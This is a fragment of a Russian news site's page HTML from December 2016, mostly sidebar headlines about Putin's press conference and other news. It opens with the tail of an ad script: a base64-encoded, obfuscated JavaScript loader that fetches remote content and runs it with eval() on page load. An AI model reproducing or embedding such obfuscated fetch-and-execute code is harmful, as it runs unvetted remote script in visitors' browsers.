2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-news441109">
    
<a href="/news/2016/12/23/umbrella/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/press_1482488649.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Журналисты на большой пресс-конференции Владимира Путина" title="Журналисты на большой пресс-конференции Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин рассказал о ядерном зонтике России
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441108">
    
<a href="/news/2016/12/23/regions/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/putin_zS7bQ8H_1482488537.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин заявил о серьезной задолженности регионов
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441102">
    
<a href="/news/2016/12/23/poroshenko/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/02/thumbs/porohenko_1482488505.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Президент Украины Петр Порошенко" title="Президент Украины Петр Порошенко" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Рейтинг недоверия Порошенко достиг рекордных 82%
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441107">
    
<a href="/news/2016/12/23/dope_control/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/press2_1482487907.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Журналисты на большой пресс-конференции Владимира Путина" title="Журналисты на большой пресс-конференции Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин назвал допинговый скандал политическим
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441095">
    
<a href="/news/2016/12/23/e_cigarettes/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/10/11/thumbs/e-cigarette-1301670_960_720_1482487718.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Электронная сигарета." title="Электронная сигарета." height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Минздрав задумал ввести ограничения на электронные сигареты
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441106">
    
<a href="/news/2016/12/23/ukraina/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/putin_zS7bQ8H_1482487787.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин выразил надежду на нормализацию отношений с Украиной
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441105">
    
<a href="/news/2016/12/23/weakness/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/press3_1482487328.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Журналисты на большой пресс-конференции Владимира Путина" title="Журналисты на большой пресс-конференции Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин указал на слабости американских властей
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441104">
    
<a href="/news/2016/12/23/pay/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/putin2_1482487288.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин назвал одну из важнейших проблем Крыма
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article48871">
    
<a href="/article/2016/12/23/burkov/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/echr_burkov_1482480021.JPG.0x142_q85_crop_cropsize-190x142.jpg" alt="Антон Бурков. Фрагмент фото с сайта sutyajnik.ru" title="Антон Бурков. Фрагмент фото с сайта sutyajnik.ru" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    Антон Бурков
  
</div>

    <h4>
      «Сутяжник»: дела, меняющие практику
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441081">
    
<a href="/news/2016/12/23/mutko/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2014/11/17/thumbs/mutko_1482486653.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Виталий Мутко" title="Виталий Мутко" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Мутко прокомментировал отмену спортивных соревнований в России
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441051">
    
<a href="/news/2016/12/23/ps_limusaurus/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/ps_cc_CreditYuChen_16x9_1482486711.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Лимузавры" title="Лимузавры" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Лимузавры теряли зубы по мере взросления
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441100">
    
<a href="/news/2016/12/23/agressor/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/23/thumbs/putin_OKRQYM6_1482486413.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин объяснил свои слова о превосходстве РФ над любым агрессором
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news441098">
    
<a href="/news/2016/12/23/killed/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/12/20/thumbs/31753314715_125edbba2f_b_1482487039.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Полицейское оцепление на месте инцидента с грузовиком в Берлине" title="Полицейское оцепление на месте инцидента с грузовиком в Берлине" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Подозреваемый в совершении теракта в Берлине убит в перестрелке в Милане 
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/23/thumbs/putin2_1482486253.jpg.88x66_q85.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/23/ulukaev/" class="hover">Путин объяснил отставку Улюкаева</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/20/thumbs/31753314715_125edbba2f_b_1482487039.jpg.88x66_q85.jpg" alt="Полицейское оцепление на месте инцидента с грузовиком в Берлине" title="Полицейское оцепление на месте инцидента с грузовиком в Берлине" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/23/killed/" class="hover">Подозреваемый в совершении теракта в Берлине убит в перестрелке в Милане</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/23/thumbs/putin_OKRQYM6_1482486413.jpg.88x66_q85.jpg" alt="Большая пресс-конференция Владимира Путина" title="Большая пресс-конференция Владимира Путина" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/23/agressor/" class="hover">Путин объяснил свои слова о превосходстве РФ над любым агрессором</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/23/thumbs/press_1482485477.jpg.88x66_q85.jpg" alt="Журналисты на большой пресс-конференции Владимира Путина" title="Журналисты на большой пресс-конференции Владимира Путина" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/23/cbr_putin/" class="hover">Путин рассказал о всеобщей поддержке действий ЦБ</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2013/06/26/thumbs/sovfed_1482483003.png.88x66_q85.jpg" alt="Совет Федерации" title="Совет Федерации" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/23/diplomats_lists/" class="hover">В Совфеде рассказали о «расстрельных списках» российских дипломатов</a>
      </div>
    </div>
  
</div>



  
<div class="archive-calendar"><a href="/news/">Архив новостей</a></div>
<script type="text/javascript">
  function mkday(y,m,d) { return parseInt((new Date(y,m-1,d)).getTime() / 86400000); }
  var politcal_dates = [mkday(2016,12,1),mkday(2016,12,2),mkday(2016,12,3),mkday(2016,12,4),mkday(2016,12,5),mkday(2016,12,6),mkday(2016,12,7),mkday(2016,12,8),mkday(2016,12,9),mkday(2016,12,10),mkday(2016,12,11),mkday(2016,12,12),mkday(2016,12,13),mkday(2016,12,14),mkday(2016,12,15),mkday(2016,12,16),mkday(2016,12,17),mkday(2016,12,18),mkday(2016,12,19),mkday(2016,12,20),mkday(2016,12,21),mkday(2016,12,22),mkday(2016,12,23)].join(',');
  var calendar_type = "news";
</script>

<div id="politcal"></div>

<script charset="utf-8" src="/static/polit/js/politcal.js" type="text/javascript"></script>



  

  <div class="most-read">
  <h4 class="subject">Самое читаемое</h4>
  
<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/07/07/thumbs/so600-450_1482265747.jpg.88x66_q85.jpg" alt="Б. Обама разговаривает по телефону" title="Б. Обама разговаривает по телефону" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/20/red_phone/" class="hover">Обама звонил Путину по «красному телефону»</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/06/14/thumbs/LNR_1482129553.jpg.88x66_q85.jpg" alt="Бойцы ЛНР" title="Бойцы ЛНР" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/19/logvinovo/" class="hover">В ЛНР сообщили о попытке прорыва ВСУ в районе Дебальцево</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/12/14/thumbs/1_obZP8jE_1481728667.jpg.88x66_q85.jpg" alt="Елена Гагарина" title="Елена Гагарина" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/14/elena_gagarina/" class="hover">Директор музеев Кремля поддержала передачу золота скифов Украине</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/08/10/thumbs/0_ef634_63431f19_orig_1481707776.jpg.88x66_q85.jpg" alt="Курильские острова" title="Курильские острова" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/14/kremlin_kurils/" class="hover">Кремль прокомментировал данные о базах США на Курилах</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2015/09/19/thumbs/%D0%9B%D0%B5%D0%BE%D0%BD%D0%B8%D0%B4_%D0%9A%D1%80%D0%B0%D0%B2%D1%87%D1%83%D0%BA_1481706809.jpg.88x66_q85.jpg" alt="Леонид Кравчук" title="Леонид Кравчук" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2016/12/14/liquidation/" class="hover">Первый президент Украины поделился мыслями о ликвидации РФ</a>
      </div>
    </div>
  
</div>

</div>


  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:24</span>
            </span><a href="/news/2016/12/23/umbrella/" class="hover">Путин рассказал о ядерном зонтике России</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:22</span>
            </span><a href="/news/2016/12/23/regions/" class="hover">Путин заявил о серьезной задолженности регионов</a>
        </div>
    
    </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:21</span>
            </span><a href="/news/2016/12/23/poroshenko/" class="hover">Рейтинг недоверия Порошенко достиг рекордных 82%</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:11</span>
            </span><a href="/news/2016/12/23/dope_control/" class="hover">Путин назвал допинговый скандал политическим</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:10</span>
            </span><a href="/news/2016/12/23/e_cigarettes/" class="hover">Минздрав задумал ввести ограничения на электронные сигареты</a>
        </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2016/12/23/kim/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Юлий Ким</div>
  
    <img src="/media/photolib/2016/12/21/thumbs/pilorama-28-07-12-44_0-400x267_1482333007.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Юлий Ким" title="Юлий Ким" width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">23 декабря 1936 года родился Юлий Ким, бард, поэт и драматург</div>
</a>
</div>


    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:09</span>
            </span><a href="/news/2016/12/23/ukraina/" class="hover">Путин выразил надежду на нормализацию отношений с Украиной</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:02</span>
            </span><a href="/news/2016/12/23/weakness/" class="hover">Путин указал на слабости американских властей</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:01</span>
            </span><a href="/news/2016/12/23/pay/" class="hover">Путин назвал одну из важнейших проблем Крыма</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:52</span>
            </span><a href="/news/2016/12/23/mutko/" class="hover">Мутко прокомментировал отмену спортивных соревнований в России</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:51</span>
            </span><a href="/news/2016/12/23/ps_limusaurus/" class="hover">Лимузавры теряли зубы по мере взросления</a>
        </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:46</span>
            </span><a href="/news/2016/12/23/agressor/" class="hover">Путин объяснил свои слова о превосходстве РФ над любым агрессором</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:44</span>
            </span><a href="/news/2016/12/23/killed/" class="hover">Подозреваемый в совершении теракта в Берлине убит в перестрелке в Милане </a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:44</span>
            </span><a href="/news/2016/12/23/ulukaev/" class="hover">Путин объяснил отставку Улюкаева </a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:38</span>
            </span><a href="/news/2016/12/23/nemcov/" class="hover">Путин следит за делом Немцова</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:35</span>
            </span><a href="/news/2016/12/23/iphone/" class="hover">Россия попросила Apple помочь взломать iPhone убийцы Карлова</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:31</span>
            </span><a href="/news/2016/12/23/cbr_putin/" class="hover">Путин рассказал о всеобщей поддержке действий ЦБ</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:28</span>
            </span><a href="/news/2016/12/23/simple_people/" class="hover">Трамп пригласил на инаугурацию простых людей</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:20</span>
            </span><a href="/news/2016/12/23/agriculture/" class="hover">Путин: правительство продолжит субсидировать сельское хозяйство</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:17</span>
            </span><a href="/news/2016/12/23/fas_alekperov/" class="hover">ФАС сделала замечание Алекперову из-за прогнозов по ценам на топливо</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:14</span>
            </span><a href="/news/2016/12/23/er_sidorenko/" class="hover">ЕР приостановила членство арестованного вице-губернатора Приморья</a>
        </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:13</span>
            </span><a href="/news/2016/12/23/inflation/" class="hover">Путин заявил о рекордно низкой инфляции в этом году</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:06</span>
            </span><a href="/news/2016/12/23/megafon/" class="hover">«Мегафон» раскрыл стоимость предстоящей покупки Mail.Ru</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:03</span>
            </span><a href="/news/2016/12/23/press_conference/" class="hover">Владимир Путин начал большую пресс-конференцию</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:00</span>
            </span><a href="/news/2016/12/23/novikov/" class="hover">Шансонье Александра Новикова обвинили в мошенничестве на 36 млн рублей</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:52</span>
            </span><a href="/news/2016/12/23/diplomats_lists/" class="hover">В Совфеде рассказали о «расстрельных списках» российских дипломатов</a>
        </div>
    
    </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:49</span>
            </span><a href="/news/2016/12/23/uber_gett/" class="hover">Uber и Gett решили ввести «проездные на такси» в Москве</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:38</span>
            </span><a href="/news/2016/12/23/expertise/" class="hover">Иркутский Минздрав назвал причину отравления «Боярышником»</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:32</span>
            </span><a href="/news/2016/12/23/kolomoisky/" class="hover">Коломойский похвалил украинские власти за приватизацию Приватбанка</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:27</span>
            </span><a href="/news/2016/12/23/ps_50000/" class="hover">Анализ 50000 геномов обнаружил новые связи генов и болезней</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:19</span>
            </span><a href="/news/2016/12/23/fitch/" class="hover">Fitch отозвал рейтинги всех компаний РФ по национальной шкале</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\240x400\0 */
google_ad_slot = "2380101327";
google_ad_width = 240;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:12</span>
            </span><a href="/news/2016/12/23/journalists/" class="hover">В ЛНР рассказали о попавших под артобстрел в Дебальцево журналистах</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:06</span>
            </span><a href="/news/2016/12/23/road_signs/" class="hover">Уменьшенные дорожные знаки установят в Москве и Петербурге</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:54</span>
            </span><a href="/news/2016/12/23/expectations/" class="hover">Большинство опрошенных россиян ждут разоблачений чиновников в 2017 году</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:53</span>
            </span><a href="/news/2016/12/23/sbu/" class="hover">СБУ предложила обсудить автономию «украинской» Тюмени и Дальнего Востока</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:50</span>
            </span><a href="/news/2016/12/23/ps_insects_migations/" class="hover">Радары обнаружили триллионы ежегодно мигрирующих насекомых</a>
        </div>
    

    
    
    
    
    
    
    <div class="news-right-slot35"></div>

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:27</span>
            </span><a href="/news/2016/12/23/topilin/" class="hover">Минтруд обусловил повышение пенсионного возраста увеличением пенсий</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:20</span>
            </span><a href="/news/2016/12/23/putin_netaniahu/" class="hover">Путин и Нетаньяху обсудили терроризм и Ближний Восток</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:18</span>
            </span><a href="/news/2016/12/23/detained/" class="hover">В Германии по подозрению в подготовке теракта‍ задержаны двое</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:00</span>
            </span><a href="/news/2016/12/23/virtual_operator/" class="hover">СМИ сообщили о планах РЖД создать оператора сотовой связи</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:58</span>
            </span><a href="/news/2016/12/23/mikhalkov/" class="hover">РСП Михалкова заподозрили в краже 1,84 млрд рублей </a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:43</span>
            </span><a href="/news/2016/12/23/miller/" class="hover">Штаб Трампа объяснил его слова о расширении ядерного потенциала США</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:32</span>
            </span><a href="/news/2016/12/23/pochta/" class="hover">Российским почтальонам купят смартфоны на 195 млн рублей </a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:32</span>
            </span><a href="/news/2016/12/23/penalty/" class="hover">Отказавшихся голосовать за Клинтон выборщиков оштрафовали</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:14</span>
            </span><a href="/news/2016/12/23/brennan/" class="hover">Глава ЦРУ выступил против кибератак на Россию</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:47</span>
            </span><a href="/news/2016/12/23/toll74/" class="hover">Число жертв отравления «Боярышником» выросло до 74 человек</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:17</span>
            </span><a href="/news/2016/12/23/nko/" class="hover">США призвали Россию отменить закон об иноагентах</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:11</span>
            </span><a href="/news/2016/12/23/execution/" class="hover">СМИ сообщили о казни боевиками ИГ турецких военных в Сирии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">07:57</span>
            </span><a href="/news/2016/12/23/putin_army/" class="hover">Госдеп не согласился со словами Путина о превосходстве российской армии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">02:17</span>
            </span><a href="/news/2016/12/23/internet/" class="hover">Анкара ограничила туркам доступ к соцсетям</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">02:10</span>
            </span><a href="/news/2016/12/23/police/" class="hover">Иркутская полиция изъяла 10 тысяч бутылок аналога «Боярышника»</a>
        </div>
    

    
    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight7">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight6">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight6">Google</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nato/" class="weight9">NATO</a>
  

  

  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight7 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/pussy-riot/" class="weight8">Pussy Riot</a>
  
